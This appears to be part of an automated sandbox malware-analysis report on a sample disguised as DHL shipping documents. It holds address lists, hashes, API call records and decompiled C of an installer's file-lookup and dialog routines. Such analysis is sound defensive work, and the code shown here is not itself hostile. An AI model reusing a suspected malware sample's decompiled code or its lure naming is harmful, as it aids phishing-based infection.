                        0x00406bfd
                        0x00000000
                        0x00000000
                        0x00406c06
                        0x00406c09
                        0x00406c0c
                        0x00406c10
                        0x00000000
                        0x00000000
                        0x00406c16
                        0x00406c19
                        0x00406c1b
                        0x00406c1c
                        0x00406c1f
                        0x00406c21
                        0x00406c22
                        0x00406c24
                        0x00406c27
                        0x00406c2c
                        0x00406c31
                        0x00406c3a
                        0x00406c4d
                        0x00406c50
                        0x00406c5c
                        0x00406c84
                        0x00406c86
                        0x00406c94
                        0x00406c94
                        0x00406c98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406c88
                        0x00406c88
                        0x00406c8b
                        0x00406c8c
                        0x00406c8c
                        0x00000000
                        0x00406c88
                        0x00406c62
                        0x00406c67
                        0x00406c67
                        0x00406c70
                        0x00406c78
                        0x00406c7b
                        0x00000000
                        0x00406c81
                        0x00406c81
                        0x00000000
                        0x00406c81
                        0x00000000
                        0x00406c9e
                        0x00406c9e
                        0x00406ca2
                        0x0040754e
                        0x00000000
                        0x0040754e
                        0x00406cab
                        0x00406cbb
                        0x00406cbe
                        0x00406cc1
                        0x00406cc1
                        0x00406cc1
                        0x00406cc4
                        0x00406cc8
                        0x00000000
                        0x00000000
                        0x00406cca
                        0x00406cd0
                        0x00406cfa
                        0x00406d00
                        0x00406d07
                        0x00000000
                        0x00406d07
                        0x00406cd6
                        0x00406cd9
                        0x00406cde
                        0x00406cde
                        0x00406ce9
                        0x00406cf1
                        0x00406cf4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d39
                        0x00406d3f
                        0x00406d42
                        0x00406d4f
                        0x00406d57
                        0x00000000
                        0x00000000
                        0x00406d0e
                        0x00406d0e
                        0x00406d12
                        0x0040755d
                        0x00000000
                        0x0040755d
                        0x00406d1e
                        0x00406d29
                        0x00406d29
                        0x00406d29
                        0x00406d2c
                        0x00406d2f
                        0x00406d32
                        0x00406d37
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406ffe
                        0x00407002
                        0x00407020
                        0x00407023
                        0x0040702a
                        0x0040702d
                        0x00407030
                        0x00407033
                        0x00407036
                        0x00407039
                        0x0040703b
                        0x00407042
                        0x00407043
                        0x00407045
                        0x00407048
                        0x0040704b
                        0x0040704e
                        0x0040704e
                        0x00407053
                        0x00000000
                        0x00407053
                        0x00407004
                        0x00407007
                        0x0040700a
                        0x00407014
                        0x00000000
                        0x00000000
                        0x00407068
                        0x0040706c
                        0x0040708f
                        0x00407092
                        0x00407095
                        0x0040709f
                        0x0040706e
                        0x0040706e
                        0x00407071
                        0x00407074
                        0x00407077
                        0x00407084
                        0x00407087
                        0x00407087
                        0x00000000
                        0x00000000
                        0x004070ab
                        0x004070af
                        0x00000000
                        0x00000000
                        0x004070b5
                        0x004070b9
                        0x00000000
                        0x00000000
                        0x004070bf
                        0x004070c1
                        0x004070c5
                        0x004070c5
                        0x004070c8
                        0x004070cc
                        0x00000000
                        0x00000000
                        0x0040711c
                        0x00407120
                        0x00407127
                        0x0040712a
                        0x0040712d
                        0x00407137
                        0x00000000
                        0x00407137
                        0x00407122
                        0x00000000
                        0x00000000
                        0x00407143
                        0x00407147
                        0x0040714e
                        0x00407151
                        0x00407154
                        0x00407149
                        0x00407149
                        0x00407149
                        0x00407157
                        0x0040715a
                        0x0040715d
                        0x0040715d
                        0x00407160
                        0x00407163
                        0x00407166
                        0x00407166
                        0x00407169
                        0x00407170
                        0x00407175
                        0x00000000
                        0x00000000
                        0x00407203
                        0x00407203
                        0x00407207
                        0x004075a5
                        0x00000000
                        0x004075a5
                        0x0040720d
                        0x00407210
                        0x00407213
                        0x00407217
                        0x0040721a
                        0x00407220
                        0x00407222
                        0x00407222
                        0x00407222
                        0x00407225
                        0x00407228
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x00000000
                        0x00000000
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x00000000
                        0x004073c8
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00000000
                        0x00407489
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c7
                        0x004074c7
                        0x004074cb
                        0x0040752b
                        0x0040752e
                        0x00407533
                        0x00407534
                        0x00407536
                        0x00407538
                        0x0040753b
                        0x00000000
                        0x0040753b
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074eb
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x0040751d
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x00000000
                        0x00407390
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                        • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                        • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                        • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                        0x004069a9
                        0x004069b2
                        0x00000000
                        0x004069bf
                        0x004069b5
                        0x00000000

                        APIs
                        • FindFirstFileW.KERNELBASE(74D0FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004069A9
                        • FindClose.KERNEL32(00000000), ref: 004069B5
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                        • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                        • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                        • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                        C-Code - Quality: 84%
                        			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                        0x004040d0
                        0x004040d7
                        0x0040423e
                        0x00404242
                        0x00404246
                        0x00404248
                        0x0040424d
                        0x00404258
                        0x00404263
                        0x00404268
                        0x0040426a
                        0x0040426c
                        0x0040426f
                        0x00404274
                        0x00404282
                        0x0040428f
                        0x00404296
                        0x00404296
                        0x00404297
                        0x00404297
                        0x0040429c
                        0x004042a2
                        0x004042a9
                        0x004042af
                        0x004042b1
                        0x004042f1
                        0x004042f6
                        0x004042fb
                        0x004042fb
                        0x00404300
                        0x00404309
                        0x0040430b
                        0x00404310
                        0x00404316
                        0x0040431a
                        0x0040431a
                        0x0040431f
                        0x00404325
                        0x00000000
                        0x00000000
                        0x00404330
                        0x00404336
                        0x00000000
                        0x00000000
                        0x0040433f
                        0x00404347
                        0x0040434c
                        0x0040434f
                        0x00404355
                        0x0040435a
                        0x0040435d
                        0x00404363
                        0x00404368
                        0x0040436b
                        0x00404371
                        0x00404379
                        0x0040437f
                        0x00404385
                        0x00404389
                        0x00404390
                        0x00404390
                        0x00404390
                        0x0040439a
                        0x004043ac
                        0x004043b8
                        0x004043bd
                        0x004043c7
                        0x004043cd
                        0x004043cf
                        0x004043d4
                        0x004043d1
                        0x004043d1
                        0x004043d1
                        0x004043e4
                        0x004043fc
                        0x004043fe
                        0x00404404
                        0x00404419
                        0x00404406
                        0x0040440f
                        0x00404411
                        0x00404411
                        0x0040441f
                        0x00404430
                        0x00404446
                        0x0040444d
                        0x00404453
                        0x00404457
                        0x0040445c
                        0x0040445e
                        0x00000000
                        0x00404464
                        0x00404464
                        0x00404466
                        0x00000000
                        0x00000000
                        0x0040446c
                        0x00404470
                        0x00404495
                        0x0040449b
                        0x004044a1
                        0x004044a3
                        0x00000000
                        0x00000000
                        0x004044c9
                        0x004044cf
                        0x004044d1
                        0x004044d6
                        0x00000000
                        0x00000000
                        0x004044dc
                        0x004044df
                        0x004044e2
                        0x004044f9
                        0x00404505
                        0x0040451e
                        0x00404524
                        0x00404528
                        0x0040452d
                        0x00404533
                        0x00000000
                        0x00000000
                        0x0040453d
                        0x00404548
                        0x00000000
                        0x00404548
                        0x00404472
                        0x00404478
                        0x00000000
                        0x00000000
                        0x0040447e
                        0x00404484
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040448a
                        0x0040445e
                        0x00404555
                        0x00404561
                        0x00404568
                        0x00000000
                        0x004042b3
                        0x004042b3
                        0x004042b6
                        0x004042e9
                        0x004042e9
                        0x004042eb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004042eb
                        0x004042b8
                        0x004042bc
                        0x004042c1
                        0x004042c3
                        0x00000000
                        0x00000000
                        0x004042d3
                        0x004042db
                        0x00000000
                        0x004042e1
                        0x004040e9
                        0x004040e9
                        0x004040ed
                        0x004040f2
                        0x00404101
                        0x00404101
                        0x00404107
                        0x0040410e
                        0x00404152
                        0x00404158
                        0x00404171
                        0x00404174
                        0x00404187
                        0x0040418d
                        0x00000000
                        0x00000000
                        0x00404193
                        0x0040419e
                        0x004041a0
                        0x004041a2
                        0x004041c1
                        0x004041c1
                        0x004041c4
                        0x004041c9
                        0x004041cc
                        0x004041dc
                        0x004041dd
                        0x004041df
                        0x00404215
                        0x00404225
                        0x00000000
                        0x00404225
                        0x004041e1
                        0x004041e7
                        0x00404200
                        0x00404205
                        0x00404207
                        0x00000000
                        0x00000000
                        0x00404209
                        0x004041f5
                        0x004041f5
                        0x004041f7
                        0x004041f7
                        0x00000000
                        0x004041f7
                        0x004041ea
                        0x004041ef
                        0x00000000
                        0x004041ef
                        0x004041ce
                        0x004041d4
                        0x00000000
                        0x00000000
                        0x004041d6
                        0x00000000
                        0x004041d6
                        0x004041c6
                        0x00000000
                        0x004041c6
                        0x004041ac
                        0x004041b3
                        0x004041b9
                        0x004041bb
                        0x00404591
                        0x00000000
                        0x00404591
                        0x00000000
                        0x004041bb
                        0x00404179
                        0x00000000
                        0x00404181
                        0x00404160
                        0x00404166
                        0x0040456e
                        0x0040456e
                        0x00404574
                        0x00404581
                        0x00404587
                        0x00404587
                        0x00000000
                        0x00404110
                        0x00404115
                        0x00404121
                        0x0040412a
                        0x0040422b
                        0x00000000
                        0x00404149
                        0x0040414c
                        0x00000000
                        0x0040414c
                        0x0040412a
                        0x0040410e

                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                        • ShowWindow.USER32(?), ref: 00404121
                        • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                        • ShowWindow.USER32(?,00000004), ref: 0040414C
